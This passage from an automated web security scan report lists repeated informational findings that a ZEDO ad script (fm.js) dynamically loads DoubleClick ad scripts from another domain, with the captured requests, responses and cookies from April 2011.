Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:41 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=24:25:24:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=100
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:41 GMT
Connection: close
Content-Length: 2138

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.8;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903895%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=24%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=24%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.83. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.14527854325225092 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=39:42:39:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=40:39:42:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=38
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:43 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=40%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=40%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.84. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.23164392112698556 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=45:49:45:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=46:45:49:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=112
Expires: Sun, 24 Apr 2011 16:51:55 GMT
Date: Sun, 24 Apr 2011 16:50:03 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=46%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=46%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.85. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.04234137504326618 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=53:64:54:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=55:53:64:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=156
Expires: Sun, 24 Apr 2011 16:53:38 GMT
Date: Sun, 24 Apr 2011 16:51:02 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=55%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=55%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.86. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.2760806087203951 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=27:25:27:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:2,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:47 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,3:809,1050,7:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=26:27:27:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=94
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:47 GMT
Connection: close
Content-Length: 2114

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3271.dogtimemedia.com/B5314413.10;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=921885%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=26%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=26%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.87. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.360491794551258 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=37:36:38:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=38:36:38:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=48
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:33 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=38%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=38%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.88. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.7879302010457392 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=19:19:20:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:24 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=21:19:19:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=117
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:24 GMT
Connection: close
Content-Length: 2154

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.4;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903902%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=21%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=21%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.89. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.009805771930176177 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=1:None:None:None; FFCap=1574B809,210132|0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841|0,1,1:0,1,1;expires=Tue, 24 May 2011 16:46:49 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:None:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=212
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:49 GMT
Connection: close
Content-Length: 2855

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929089%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=1%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=1%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.90. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.6196228306066651 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=12:12:13:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:59 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=14:12:12:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=142
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:59 GMT
Connection: close
Content-Length: 2109

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.32;sz=160x600;click=http://yads.zedo.com/ads2/c?a=929080%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=14%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=14%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.91. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.921064397747952 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFad=2:2:0:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732|0,1,1:0,1,1:0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|0,1,1:0,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:46:16 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:2:2:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=245
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:16 GMT
Connection: close
Content-Length: 2142

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.10;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911254%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=1%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=1%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.92. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.13874236844038118 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
